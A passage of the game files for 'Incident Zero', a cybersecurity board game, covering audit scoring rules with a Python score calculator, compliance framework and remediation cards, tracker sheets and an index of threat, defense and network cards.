| DOMAIN-03 Detection | -1 to Investigation rolls |
| DOMAIN-04 Backup | None (matters in DR) |
| DOMAIN-05 Vendor/Cloud | -1 to WEB_EXPLOIT defenses |
| DOMAIN-06 Security Ops | -1 to Investigation rolls |
Example: if 3 domains fail, IR carries three separate -1 modifiers.
For each failed domain (FAIL = 1-2 stars): a penalty subtracted from the DR starting budget.
| Failed Domain | DR Budget Penalty |
|---|---|
| DOMAIN-01 Segmentation | -10 |
| DOMAIN-02 Identity | -15 |
| DOMAIN-03 Detection | -10 |
| DOMAIN-04 Backup | -25 |
| DOMAIN-05 Vendor/Cloud | -20 |
| DOMAIN-06 Security Ops | -5 |
Cap (v2.2): the total gap penalty applied to a subsequent module's budget is capped at -30.
Example (real budgets: DR starts at 50, IR at 100): if all 6 domains fail, the raw penalty is -85, capped at -30 — the team enters Disaster Recovery with 50 - 30 = 20 Budget.
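As an added worked example (not part of the game's own files), the following Python script implements the scoring rules stated above: the star-to-PASS/FAIL mapping ("PARTIAL" counts as FAIL), the per-domain Incident Response modifiers, the Disaster Recovery budget penalties, the -30 cap, and the optional v2.2 bonus for a 5-star Detection domain. Domain short names, penalties and the IR/DR starting budgets are copied from the two canonical tables on this page; the function and variable names are my own. Run it as-is to score the sample audit report shown earlier (2★, 3★, 1★, 2★, 2★, 4★).

```python
from dataclasses import dataclass

PASS_THRESHOLD = 3        # 1-2 stars = FAIL, 3+ stars = PASS (page's fixed mapping)
GAP_PENALTY_CAP = -30     # v2.2: total gap penalty to a follow-on budget is capped at -30
STARTING_BUDGET = {"IR": 100, "DR": 50}   # starting budgets stated on the page

# Per-domain consequences of a FAIL, from the page's canonical tables:
# (short name, Incident Response modifier or None, Disaster Recovery budget penalty).
DOMAIN_RULES = {
    "DOMAIN-01": ("Segmentation", "-1 to NETWORK defenses", -10),
    "DOMAIN-02": ("Identity", "-1 to CREDENTIAL_ABUSE defenses", -15),
    "DOMAIN-03": ("Detection", "-1 to Investigation rolls", -10),
    "DOMAIN-04": ("Backup", None, -25),          # no IR effect; matters in DR
    "DOMAIN-05": ("Vendor/Cloud", "-1 to WEB_EXPLOIT defenses", -20),
    "DOMAIN-06": ("Security Ops", "-1 to Investigation rolls", -5),
}


def domain_passes(rating):
    """Map one domain's rating (1-5 stars, or the string 'PARTIAL') to PASS/FAIL."""
    if isinstance(rating, str):
        if rating.strip().upper() == "PARTIAL":
            return False                      # "PARTIAL" counts as FAIL
        raise ValueError(f"unknown rating {rating!r}")
    if not 1 <= rating <= 5:
        raise ValueError(f"stars must be 1-5, got {rating}")
    return rating >= PASS_THRESHOLD


@dataclass
class AuditOutcome:
    passed: list
    failed: list
    ir_modifiers: list          # one entry per failed domain that has an IR effect
    ir_bonuses: list            # optional v2.2 bonus (5-star Detection)
    raw_dr_penalty: int         # sum of per-domain penalties before the cap
    dr_penalty: int             # penalty actually applied (capped at -30)
    dr_budget: int              # budget the team enters Disaster Recovery with

    @property
    def score(self) -> str:
        return f"{len(self.passed)}/6 PASS"


def score_audit(ratings):
    """ratings: {'DOMAIN-01': stars_or_PARTIAL, ..., 'DOMAIN-06': ...}; all six required."""
    missing = sorted(set(DOMAIN_RULES) - set(ratings))
    if missing:
        raise ValueError(f"missing domains: {missing}")
    passed, failed, ir_mods, raw = [], [], [], 0
    for dom in sorted(DOMAIN_RULES):
        name, ir_mod, dr_pen = DOMAIN_RULES[dom]
        if domain_passes(ratings[dom]):
            passed.append(dom)
            continue
        failed.append(dom)
        if ir_mod:                            # each failed domain is a separate -1
            ir_mods.append(f"{dom} {name}: {ir_mod}")
        raw += dr_pen
    bonuses = []
    if ratings["DOMAIN-03"] == 5:             # optional v2.2 rule from the Detection card
        bonuses.append("DOMAIN-03 Detection 5-star: +1 to Investigation rolls")
    applied = max(raw, GAP_PENALTY_CAP)       # penalties are negative, so max() caps them
    return AuditOutcome(passed, failed, ir_mods, bonuses, raw, applied,
                        STARTING_BUDGET["DR"] + applied)


# The page's sample audit report: 2, 3, 1, 2, 2, 4 stars.
SAMPLE_REPORT = {"DOMAIN-01": 2, "DOMAIN-02": 3, "DOMAIN-03": 1,
                 "DOMAIN-04": 2, "DOMAIN-05": 2, "DOMAIN-06": 4}

if __name__ == "__main__":
    out = score_audit(SAMPLE_REPORT)
    print(out.score, "| failed:", ", ".join(out.failed))
    for mod in out.ir_modifiers:
        print("  IR:", mod)
    print(f"DR penalty {out.raw_dr_penalty} capped to {out.dr_penalty}; "
          f"DR starts at {out.dr_budget}")
```

For the sample report this yields 2/6 PASS, three separate IR modifiers (Segmentation, Detection, Vendor/Cloud; Backup has none) and a raw DR penalty of -65 that the cap reduces to -30, so Disaster Recovery starts at 20 Budget, the same figure the all-six-fail example above arrives at.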
Audit & Compliance Module: Audit Domain Assessment Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/audit-compliance/expansion-deck/compliance-frameworks.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Compliance Framework Cards extend the Audit & Compliance module with industry-specific and regulation-specific assessment frameworks beyond the generic 6-domain audit.
Organizations must often comply with specific regulatory frameworks. Each framework has slightly different focuses and requirements.
Relevance: US Federal government, critical infrastructure, government contractors
Key Standard: NIST CSF (Cybersecurity Framework), 5 functions
Framework: NIST CSF
Function: Identify (AM - Asset Management, RM - Risk Management)
Focus: Knowing what systems/data you have and what risks they face
Assessment Criteria:
- Asset inventory (what systems exist?)
- Data classification (what data is sensitive?)
- Risk assessment (what could go wrong?)
- Threat intelligence (what are realistic threats?)
Scoring (1-5 stars):
- ⭐ (1): No asset inventory, no risk assessment
- ⭐⭐ (2): Partial inventory, informal risk assessment
- ⭐⭐⭐ (3): Complete inventory, documented risk assessment
- ⭐⭐⭐⭐ (4): Inventory regularly updated, risk assessment reviewed annually
- ⭐⭐⭐⭐⭐ (5): Real-time asset visibility, continuous risk assessment
Typical Findings:
- Unknown systems (shadow IT)
- Unclassified data (don't know what's sensitive)
- Missing risk assessment
- Risk assessment not updated
Remediation:
- Discovery tools (find all systems)
- Data classification policy
- Annual risk assessment
- Asset management system
Framework: NIST CSF
Function: Protect (PR.AC - Identity Management & Access Control, PR.AT - Awareness & Training, PR.DS - Data Security, PR.IP - Information Protection Processes, PR.MA - Maintenance, PR.PT - Protective Technology)
Focus: Building security controls to prevent/slow attacks
Assessment Criteria:
- Access controls (only authorized users)
- Employee training (security awareness)
- Data protection (encryption, classification)
- Information protection (DLP, data loss prevention)
- Business continuity (backup, disaster recovery)
Scoring (1-5 stars):
- ⭐ (1): No controls
- ⭐⭐ (2): Basic controls (passwords)
- ⭐⭐⭐ (3): Good controls (MFA, encryption)
- ⭐⭐⭐⭐ (4): Strong controls (defense-in-depth)
- ⭐⭐⭐⭐⭐ (5): Excellent controls (comprehensive, tested)
Typical Findings:
- Weak authentication (no MFA)
- Poor training (phishing success rate >10%)
- Unencrypted data
- No backup strategy
- Defense gaps
Remediation:
- MFA deployment
- Security training program
- Encryption implementation
- Backup/DR strategy
- Penetration testing
Framework: NIST CSF
Function: Detect (AE - Anomalies & Events, CM - Continuous Monitoring)
Focus: Detecting attacks as they happen
Assessment Criteria:
- Log monitoring (are suspicious activities logged?)
- Anomaly detection (is suspicious behavior caught?)
- Continuous monitoring (24/7 surveillance)
- Alert procedures (who responds to alerts?)
- Threat intelligence integration (using threat data)
Scoring (1-5 stars):
- ⭐ (1): No logging, no monitoring
- ⭐⭐ (2): Logging exists, limited monitoring
- ⭐⭐⭐ (3): SIEM deployed, some alerts
- ⭐⭐⭐⭐ (4): SIEM with good rules, 24/7 monitoring
- ⭐⭐⭐⭐⭐ (5): Mature SOC, threat intelligence integrated
Typical Findings:
- No SIEM deployed
- Alerts not reviewed
- No 24/7 monitoring
- Response time too slow
- Threat intel not integrated
Remediation:
- SIEM deployment
- Alert rule tuning
- SOC staffing (24/7 coverage)
- Response procedures
- Threat intel integration
Framework: NIST CSF
Function: Respond (RS.RP - Response Planning, RS.CO - Communications, RS.AN - Analysis, RS.MI - Mitigation, RS.IM - Improvements)
Focus: Responding to breaches/attacks
Assessment Criteria:
- Incident response plan (documented procedures)
- Response team (trained, staffed)
- Communication plan (who gets told when)
- Investigation procedures (forensics)
- Post-incident review (lessons learned)
Scoring (1-5 stars):
- ⭐ (1): No incident response plan
- ⭐⭐ (2): Plan exists, not tested
- ⭐⭐⭐ (3): Plan exists, annual testing
- ⭐⭐⭐⭐ (4): Plan regularly tested, team trained
- ⭐⭐⭐⭐⭐ (5): Mature response, regular exercises, continuous improvement
Typical Findings:
- No incident response plan
- Response team not trained
- No communication plan
- Investigation procedures unclear
- No post-incident reviews
Remediation:
- Incident response plan development
- Team training
- Communication procedures
- Tabletop exercises
- Post-incident review process
Framework: NIST CSF
Function: Recover (RC.RP - Recovery Planning, RC.IM - Improvements, RC.CO - Communications)
Focus: Recovering from breaches and improving for next time
Assessment Criteria:
- Recovery plan (how to restore systems)
- Recovery time objectives (RTO - how fast?)
- Recovery point objectives (RPO - how much data loss?)
- Backup verification (can you actually restore?)
- Lessons learned process (improve after incident)
Scoring (1-5 stars):
- ⭐ (1): No recovery plan, no backups
- ⭐⭐ (2): Backup exists, recovery not tested
- ⭐⭐⭐ (3): Recovery plan exists, tested annually
- ⭐⭐⭐⭐ (4): Recovery plan regularly tested, RPO/RTO defined
- ⭐⭐⭐⭐⭐ (5): Mature recovery, tested regularly, continuous improvement
Typical Findings:
- No recovery plan
- Backups untested (may not restore)
- RTO/RPO not defined
- Recovery team not trained
- No lessons learned process
Remediation:
- Recovery plan development
- Backup testing (quarterly)
- RTO/RPO definition
- Recovery team training
- Lessons learned process
Relevance: General US/Canada, healthcare, financial, government
Key Standard: CIS Controls (18 prioritized security controls)
Focus: Basic security practices (asset management, access control, data protection, secure configuration)
Assessment Criteria:
- Asset management (know what you have)
- Access control (least privilege)
- Data protection (encryption)
- Secure configuration (harden systems)
- Detection tools (SIEM, antivirus)
- Training (security awareness)
Focus: Advanced controls (incident response, supply chain, defense tools)
Assessment Criteria:
- Incident response plan
- Supply chain risk
- Vulnerability management
- Application security
- Remote services security
- Testing & monitoring
- Network segmentation
Focus: Operational controls (reporting, awareness, training, testing)
Assessment Criteria:
- Security awareness training
- Incident reporting
- Third-party risk management
- Penetration testing
- Secure development practices
Relevance: Any organization handling payment cards
Key Standard: PCI-DSS (Payment Card Industry Data Security Standard)
Focus: Network and system security for cardholder data
Assessment Criteria:
- Firewall configuration
- No default credentials
- Cardholder data protection
- Vulnerability scanning
Focus: Access control and operational procedures
Assessment Criteria:
- Antivirus/malware protection
- Secure system updates
- Access control & authentication
- Audit trails & logging
Focus: Testing, monitoring, and compliance management
Assessment Criteria:
- Security testing (penetration testing, vulnerability scanning)
- Monthly scanning
- Annual penetration testing
- Security policies
- Training
- Incident response procedures
Remediation Cards represent specific actions to address compliance findings. These can be used after an audit to remediate identified gaps.
Budget note (v2.2): these cards are the only place the Audit module's starting Budget (100, per core rules) is spent — the assessment itself costs nothing.
Cost: 5 Budget · Timeline: 2-4 weeks · Difficulty: Low-Medium
What it does:
- Deploy multi-factor authentication for all user access
- Implement MFA for VPN, remote access, email, admin access
- Select authentication method (authenticator app, hardware token, SMS)
Prerequisites:
- Identity management system (Domain Controller, Azure AD)
- User device (phone or security key)
- Application/system support for MFA
Impact:
- Reduces DOMAIN-02 (Access Control) findings
- Makes credential attacks (T-03, T-06) harder
- Improves Incident Response and Disaster Recovery modifiers
Cost: 15 Budget · Timeline: 4-8 weeks · Difficulty: Medium
What it does:
- Deploy Security Information & Event Management (SIEM)
- Configure log collection from all systems
- Create alert rules for suspicious activity
- Implement 24/7 monitoring
Prerequisites:
- Centralized logging infrastructure
- SIEM software/service (Splunk, ELK, QRadar, Azure Sentinel)
- Security personnel to manage SIEM
Impact:
- Reduces DOMAIN-03 (Threat Detection) findings
- Enables early breach detection
- Improves Incident Response investigation
- Provides audit trail for compliance
Cost: 12 Budget · Timeline: 4-6 weeks · Difficulty: Medium-High
What it does:
- Divide network into security zones (DMZ, internal, admin)
- Deploy firewalls between zones
- Configure firewall rules for inter-zone traffic
- Implement VLANs and network isolation
Prerequisites:
- Network switches/routers capable of VLAN support
- Firewall(s) for inter-zone traffic
- Network diagram and access requirements
Impact:
- Reduces DOMAIN-01 (Network Segmentation) findings
- Prevents lateral movement (T-04 becomes harder)
- Improves Disaster Recovery (limits blast radius)
- Foundational for zero-trust architecture
Cost: 10 Budget · Timeline: 2-4 weeks · Difficulty: Low-Medium
What it does:
- Implement 3-2-1 backup strategy (3 copies, 2 media, 1 offsite)
- Configure automated backups
- Test backup restoration (quarterly)
- Document recovery procedures
Prerequisites:
- Backup software/service
- Off-site storage location
- Testing schedule
Impact:
- Reduces DOMAIN-04 (Backup & DR) findings
- Enables ransomware recovery
- Improves Disaster Recovery (reduces costs)
- Supports compliance requirements
Cost: 3 Budget · Timeline: 1-2 weeks (ongoing) · Difficulty: Low
What it does:
- Develop security awareness training curriculum
- Conduct initial training for all employees
- Implement phishing simulations
- Quarterly refresher training
Prerequisites:
- Training development (internal or vendor)
- Management buy-in (release time for employees)
Impact:
- Reduces DOMAIN-06 (Security Ops) findings
- Reduces phishing success rate
- Improves overall security culture
- Compliance requirement (most frameworks)
Cost: 5 Budget · Timeline: 2-4 weeks · Difficulty: Low-Medium
What it does:
- Develop vendor security questionnaire
- Send questionnaires to key vendors
- Review vendor security controls
- Document vendor risk assessment
- Establish SLAs with security requirements
Prerequisites:
- Vendor list and criticality assessment
- Security questionnaire template
- Document review process
Impact:
- Reduces DOMAIN-05 (Third-Party Risk) findings
- Identifies supply chain risks
- Prevents SCENARIO-03 (Supply Chain Compromise)
- Compliance requirement (GDPR, etc.)
Cost: 8 Budget · Timeline: 3-4 weeks · Difficulty: Medium
What it does:
- Deploy vulnerability scanning tools
- Establish patching procedures
- Configure patch management automation
- Document vulnerability remediation process
Prerequisites:
- Vulnerability scanner (Nessus, Qualys, OpenVAS)
- Patch management tools or procedures
- Prioritization process (critical vs. non-critical)
Impact:
- Reduces multiple audit findings
- Prevents PT-05 (Privilege Escalation via unpatched kernel)
- Improves overall security posture
Cost: 12 Budget · Timeline: 4-6 weeks (plus ongoing) · Difficulty: Medium-High
What it does:
- Develop incident response plan (procedures, contacts, escalation)
- Establish incident response team
- Conduct tabletop exercises
- Implement communication procedures
Prerequisites:
- Team designation (CISO, security analysts, IT, legal, PR)
- Plan documentation
- Training and exercises
Impact:
- Reduces DOMAIN-03 (Threat Detection) and DOMAIN-06 (Security Ops) findings
- Enables faster response in the Incident Response module
- Improves Disaster Recovery effectiveness
- Compliance requirement (nearly universal)
Audit & Compliance Module: Compliance Frameworks & Remediation (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/print-templates/tracker-sheets.md
Version: 2.2 - Playtest Edition
Print on plain A4. One Universal Sheet per table, plus the module sheet for the module you're playing. Tip: laminate and use a dry-erase marker, or move a coin/token along the tracks.
Cross off as each turn ends. Circle your turn limit before starting.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
Start at your module's budget (Network Building 40-60 · Disaster Recovery 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150). Tick down in 5s.
150 145 140 135 130 125 120 115 110 105 100 95 90 85 80 75
70 65 60 55 50 45 40 35 30 25 20 15 10 5 0
100 95 90 85 80 75 70 65 60 55 50 45 40 35 30 25 20 15 10 5 0
0 1 2 3 4 5
[ ] [ ] [ ] [ ] [ ] [ ] Penalty at start of turn: -5 Budget each
Advance each meter per card effects. Victory thresholds marked ▲.
ATTRIBUTION 0 10 20 30 40 50 60 70 80 90▲ 100
TIMELINE 0 10 20 30 40 50 60 70 80▲ 90 100
ATTACK CHAIN 0 10 20 30 40 50 60 70 80▲ 90 100
CHAIN OF CUSTODY 0 10 20 30 40 50 60 70▲ 80 90 100
Victory check (end of game):
- V1 Full Attribution: Attribution ≥90 AND Timeline ≥80
- V2 Solid Case: Timeline ≥80 AND Attack Chain ≥80 AND Chain of Custody ≥70
- V3 Partial Findings: any two meters ≥70
Investigation in flight: ____ (results arrive Turn _) Evidence collected (✓ = Analyzed, one Analyze per card):
| Evidence card | Documented? (+5% CoC) | Analyzed? |
|---|---|---|
INVESTIGATION 0 10 20 30 40 50 60 70 80 90 100
REMEDIATION 0 10 20 30 40 50 60 70 80 90 100
COMMUNICATION 0 10 20 30 40 50 60 70 80 90 100
| Stakeholder | 100 | 80 | 60 | 40 | 20 (critical) | 0 (LOSS) |
|---|---|---|---|---|---|---|
| Customers | ||||||
| Employees | ||||||
| Regulators | ||||||
| Board / Investors | ||||||
| Media / Public | | | | | | |
| Turn | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
|---|---|---|---|---|---|---|---|---|
| Scheduled event | ||||||||
| Deadline | Customers notified (recommended) | Regulator penalties begin | GDPR 72h — regulators notified |
Multi-turn action in flight: ____ (completes Turn _)
| # | Domain | Stars (1-5) | PASS (3★+) / FAIL (1-2★) | Key gap found |
|---|---|---|---|---|
| 1 | Network Segmentation | |||
| 2 | Identity & Access | |||
| 3 | Detection & Monitoring | |||
| 4 | Backup & Recovery | |||
| 5 | Cloud Security | |||
| 6 | Security Operations | | | |
Result: ___ / 6 PASS — Gap penalties for follow-on modules: see module rules (total capped at -30).
| Category | Points | Notes |
|---|---|---|
| Requirements met | per requirement card | |
| Security coverage | per rules scoring table | |
| Capability coverage | per rules scoring table | |
| Budget management | per rules scoring table | |
| TOTAL | | |
Components placed:
| Component | Cost | Capacity used / total |
|---|---|---|
Budget remaining: ___ / starting ___
cards/CARD_REFERENCE.md
Version 2.2 - Playtest Edition
Complete index of all cards across all six modules. This index is generated from the card files themselves — the card files under each module folder are the canonical source of truth. If this index ever disagrees with a card file, the card file wins.
Total: 247 cards across 6 modules (the 24-card shared Defense deck is counted once).
Module total: 63 cards (12 core threats + 24 shared defenses + 8 expansion threats + 19 expansion defenses).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Core Threats | threat-defense-cards.md | T-01 – T-12 | 12 | Attack chain steps for the Threat Orchestrator, organized by kill chain phase |
| Core Defenses (shared) | threat-defense-cards.md | D-01 – D-24 | 24 | Shared with Hardening — see Shared Defense Deck |
| Expansion Threats | advanced-threats.md | T-13 – T-20 | 8 | Supply chain, insider, IoT, cloud, DNS tunneling, and physical attacks |
| Expansion Defenses | advanced-defenses.md | D-25 – D-43 | 19 | Whitelisting, behavioral analytics, container/cloud security, playbooks, backup/DR |
| Card ID | Title | Step | Vector |
|---|---|---|---|
| T-01 | Phishing Campaign | INITIAL COMPROMISE | SOCIAL ENGINEERING |
| T-02 | Watering Hole Attack | INITIAL COMPROMISE | WEB EXPLOIT |
| T-03 | Compromised Credentials | INITIAL COMPROMISE | CREDENTIAL ABUSE |
| T-04 | Lateral Movement via SMB | PIVOT & ESCALATE | NETWORK |
| T-05 | Privilege Escalation via Kernel Exploit | PIVOT & ESCALATE | MALWARE |
| T-06 | Mimikatz Credential Dumping | PIVOT & ESCALATE | CREDENTIAL ABUSE |
| T-07 | Scheduled Task Persistence | PERSISTENCE | MALWARE |
| T-08 | Registry Run Key Persistence | PERSISTENCE | MALWARE |
| T-09 | Beaconing to C2 Server | C2 & EXFIL | NETWORK |
| T-10 | SQL Database Exfiltration | C2 & EXFIL | DATA EXFIL |
| T-11 | Ransomware Payload Deployment | C2 & EXFIL | MALWARE |
| T-12 | Browser Extension Backdoor | C2 & EXFIL | DATA EXFIL |
By step: INITIAL COMPROMISE 3 (T-01–03) · PIVOT & ESCALATE 3 (T-04–06) · PERSISTENCE 2 (T-07–08) · C2 & EXFIL 4 (T-09–12).
| Card ID | Title | Step | Vector |
|---|---|---|---|
| T-13 | Compromised Software Vendor Update | INITIAL COMPROMISE | MALWARE |
| T-14 | Malicious Third-Party Library Injection | INITIAL COMPROMISE | MALWARE |
| T-15 | Malicious Insider Data Theft | C2 & EXFIL | DATA EXFIL |
| T-16 | Disgruntled Employee Sabotage | PIVOT & ESCALATE | MALWARE |
| T-17 | Compromised IoT Device as Pivot Point | INITIAL COMPROMISE | NETWORK |
| T-18 | Cloud API Token Theft & Abuse | PIVOT & ESCALATE | CREDENTIAL ABUSE |
| T-19 | DNS Tunneling Data Exfiltration | C2 & EXFIL | DATA EXFIL |
| T-20 | Physical Access + Badge Cloning Attack | INITIAL COMPROMISE | CREDENTIAL ABUSE |
Distribution: 4 BASIC (10 Budget) / 8 ADVANCED (15 Budget) / 7 ELITE (25 Budget).
| Card ID | Title | Tier (Cost) | Vector |
|---|---|---|---|
| D-25 | Application Whitelisting | BASIC (10) | MALWARE |
| D-26 | Advanced Application Control with AI | ADVANCED (15) | MALWARE |
| D-27 | Living-Off-The-Land Blocker | ELITE (25) | MALWARE |
| D-28 | Baseline Behavior Learning System | ADVANCED (15) | NETWORK |
| D-29 | Process Behavior Analysis | ADVANCED (15) | MALWARE |
| D-30 | Machine Learning Anomaly Detection | ELITE (25) | MALWARE |
| D-31 | Container Image Scanning | BASIC (10) | MALWARE |
| D-32 | Container Runtime Protection | ADVANCED (15) | MALWARE |
| D-33 | Kubernetes Network Policy & RBAC | ELITE (25) | NETWORK |
| D-34 | Cloud Configuration Auditing | BASIC (10) | CREDENTIAL ABUSE |
| D-35 | Cloud Access & Permission Auditing | ADVANCED (15) | CREDENTIAL ABUSE |
| D-36 | Cloud Compliance & Audit Trail | ELITE (25) | DATA EXFIL |
| D-37 | Playbook: Ransomware Response | ADVANCED (15) | MALWARE |
| D-38 | Playbook: Credential Compromise Response | ADVANCED (15) | CREDENTIAL ABUSE |
| D-39 | Playbook: Insider Threat Response | ELITE (25) | DATA EXFIL |
| D-40 | Playbook: Supply Chain Breach Response | ELITE (25) | WEB EXPLOIT |
| D-41 | Backup Strategy - 3-2-1 Rule | BASIC (10) | MALWARE |
| D-42 | Immutable Backup Storage | ADVANCED (15) | MALWARE |
| D-43 | Disaster Recovery Plan & Testing | ELITE (25) | MALWARE |
24 cards (D-01 – D-24), indexed once. The same deck appears in full in both module folders (Incident Response and Hardening). Print one physical set and use it in both modules.
Distribution by tier (v2.2): 8 BASIC (D-01–06, D-19, D-23) / 8 ADVANCED (D-07–12, D-18, D-24) / 8 ELITE (D-13–17, D-20–22).
| Card ID | Title | Tier (Cost) | Vector |
|---|---|---|---|
| D-01 | Email Authentication Setup | BASIC (10) | SOCIAL ENGINEERING |
| D-02 | User Security Training | BASIC (10) | SOCIAL ENGINEERING |
| D-03 | Windows Update Patching | BASIC (10) | WEB EXPLOIT |
| D-04 | Network Firewall Rules | BASIC (10) | NETWORK |
| D-05 | Log Centralization | BASIC (10) | MALWARE |
| D-06 | Basic Antivirus Deployment | BASIC (10) | MALWARE |
| D-07 | Multi-Factor Authentication (MFA) | ADVANCED (15) | CREDENTIAL ABUSE |
| D-08 | EDR (Endpoint Detection & Response) | ADVANCED (15) | MALWARE |
| D-09 | Network Segmentation | ADVANCED (15) | NETWORK |
| D-10 | SIEM Correlation Rules | ADVANCED (15) | NETWORK |
| D-11 | Data Loss Prevention (DLP) | ADVANCED (15) | DATA EXFIL |
| D-12 | Password Manager & Vault | ADVANCED (15) | CREDENTIAL ABUSE |
| D-13 | Threat Hunting Program | ELITE (25) | MALWARE |
| D-14 | Memory Forensics | ELITE (25) | MALWARE |
| D-15 | Deception Technology (Honeypots) | ELITE (25) | NETWORK |
| D-16 | Credential Guard & Secure Boot | ELITE (25) | CREDENTIAL ABUSE |
| D-17 | Advanced Malware Sandbox | ELITE (25) | MALWARE |
| D-18 | Intrusion Prevention System (IPS) | ADVANCED (15) | WEB EXPLOIT |
| D-19 | Backup & Disaster Recovery | BASIC (10) | MALWARE |
| D-20 | Zero Trust Access Control | ELITE (25) | CREDENTIAL ABUSE |
| D-21 | Container Security & Orchestration | ELITE (25) | MALWARE |
| D-22 | Security Information & Event Management (SIEM) | ELITE (25) | NETWORK |
| D-23 | IR Program & Runbooks | BASIC (10) | NETWORK |
| D-24 | Threat Intelligence Integration | ADVANCED (15) | NETWORK + DATA EXFIL (dual-tagged) |
Distribution by vector (v2.2): SOCIAL ENGINEERING 2 · WEB EXPLOIT 2 · CREDENTIAL ABUSE 4 · MALWARE 8 · NETWORK 7 · DATA EXFIL 2. D-24 is dual-tagged (NETWORK + DATA EXFIL), so vector tags sum to 25 across 24 cards.
Module total: 16 tactic cards + the Shared Defense Deck (24 cards, indexed above).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Defense Cards (shared) | defense-cards.md | D-01 – D-24 | 24 | Same deck as IR core — see Shared Defense Deck |
| Core Pentester Tactics | pentester-tactic-cards.md | PT-01 – PT-08 | 8 | Red-team tactics that test deployed defenses (d20 vs DC) |
| Expansion Tactics | advanced-tactics.md | PT-09 – PT-16 | 8 | Multi-vector, zero-day, ransomware, APT, cloud/IoT/firmware/container attacks |
| Card ID | Title | Difficulty (DC) | Target Vectors |
|---|---|---|---|
| PT-01 | Social Engineering - Pretexting Attack | BASIC (DC 12) | SOCIAL_ENGINEERING, CREDENTIAL_ABUSE |
| PT-02 | Malware Evasion - Living-off-the-Land Technique | INTERMEDIATE (DC 13) | MALWARE, CREDENTIAL_ABUSE |
| PT-03 | Credential Dumping - Mimikatz Attack | INTERMEDIATE (DC 13) | CREDENTIAL_ABUSE, MALWARE |
| PT-04 | Lateral Movement - Network Traversal | INTERMEDIATE (DC 13) | NETWORK, CREDENTIAL_ABUSE |
| PT-05 | Privilege Escalation - Unpatched Kernel Exploit | ADVANCED (DC 14) | MALWARE, WEB_EXPLOIT |
| PT-06 | Data Exfiltration - Unmonitored Channel | ADVANCED (DC 14) | DATA_EXFIL, NETWORK |
| PT-07 | Supply Chain Compromise - Trusted Software Update | ADVANCED (DC 14) | MALWARE, WEB_EXPLOIT |
| PT-08 | Insider Threat - Malicious Administrator | EXPERT (DC 15) | CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK |
| Card ID | Title | Difficulty (DC) | Target Vectors |
|---|---|---|---|
| PT-09 | Multi-Vector Attack - Coordinated Campaign | ADVANCED (DC 14) | Multiple (per-phase rolls) |
| PT-10 | Zero-Day Exploitation - Unknown Vulnerability | EXPERT (DC 15) | MALWARE, WEB_EXPLOIT |
| PT-11 | Ransomware Deployment & Encryption | EXPERT (DC 15) | MALWARE, DATA_EXFIL, NETWORK |
| PT-12 | APT Campaign - Multi-Turn Persistent Threat | EXPERT+ (DC 16, escalates +1/turn undetected) | Multiple |
| PT-13 | Cloud-Specific Attack - Misconfigured Cloud Resources | ADVANCED (DC 14) | Multiple |
| PT-14 | IoT/OT Compromise - Industrial Network Attack | ADVANCED (DC 14) | NETWORK, MALWARE |
| PT-15 | Firmware/BIOS Attack - Bootloader Compromise | EXPERT (DC 15) | MALWARE, NETWORK |
| PT-16 | Privilege Escalation - Containerized Environment Escape | EXPERT (DC 15) | MALWARE, NETWORK |
Module total: 77 cards (33 core + 8 expansion + 36 standalone).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Servers | server-cards.md | SRV-01 – SRV-10 | 10 | Server types with cost, capacity, complexity, and availability |
| Security Devices | security-device-cards.md | SEC-01 – SEC-10 | 10 | Security appliances with cost, vectors covered, and placement |
| Architectures | architecture-cards.md | ARCH-01 – ARCH-05 | 5 | Network topology choices with cost/complexity trade-offs |
| Assets | asset-cards.md | ASSET-01 – ASSET-08 | 8 | Business functions the network must support |
| Legacy Systems (exp.) | legacy-systems.md | LEGACY-01 – LEGACY-04 | 4 | Unpatched, mission-critical legacy burdens |
| Cloud Variants (exp.) | cloud-variants.md | CLOUD-01 – CLOUD-04 | 4 | Modern cloud deployment alternatives |
| Business Requirements (standalone) | business-requirement-cards.md | REQ-01 – REQ-20 | 20 | Draw-deck requirements for standalone play |
| Operational Events (standalone) | operational-event-cards.md | EVT-01 – EVT-16 | 16 | Draw-deck operational events for standalone play |
| Card ID | Title | Cost | Key Risk |
|---|---|---|---|
| SRV-01 | Email Server | 8 | Phishing, Credential Abuse |
| SRV-02 | Web Server | 7 | Web Exploits, RCE |
| SRV-03 | Database Server | 10 | SQL Injection, Data Exfil |
| SRV-04 | File Server | 6 | SMB Laterals, Ransomware |
| SRV-05 | Domain Controller | 12 | Mimikatz, Complete Compromise |
| SRV-06 | Development Server | 5 | Lateral Movement, Data Leak |
| SRV-07 | Backup Server | 9 | Ransomware, Recovery Failure |
| SRV-08 | Cloud Workload | 4 | Misconfiguration, IAM Abuse |
| SRV-09 | Legacy System | 3 | Known Vulns, Cannot Patch |
| SRV-10 | Honeypot Decoy | 7 | Detection, Early Warning |
| Card ID | Title | Cost | Primary Vectors / Placement |
|---|---|---|---|
| SEC-01 | Firewall (Perimeter) | 12 | NETWORK, CREDENTIAL / Perimeter |
| SEC-02 | Intrusion Detection System (IDS) | 10 | MALWARE, NETWORK / Internal |
| SEC-03 | Intrusion Prevention System (IPS) | 14 | MALWARE, WEB, NETWORK / Internal |
| SEC-04 | Load Balancer | 8 | NETWORK (availability) / Web Tier |
| SEC-05 | VPN Gateway | 9 | CREDENTIAL, NETWORK / Perimeter |
| SEC-06 | Email Gateway | 6 | SOCIAL_ENG, MALWARE / Perimeter |
| SEC-07 | Web Application Firewall (WAF) | 11 | WEB, MALWARE / Web Tier |
| SEC-08 | Network Segmentation Switch | 10 | CREDENTIAL, NETWORK / Internal |
| SEC-09 | SIEM (Security Information & Event Management) | 15 | Multiple (detection) / Central |
| SEC-10 | Honeypot Network | 8 | NETWORK (detection) / Isolated |
| Card ID | Title | Cost | Complexity |
|---|---|---|---|
| ARCH-01 | Flat Network (Traditional) | 0 | 1/5 |
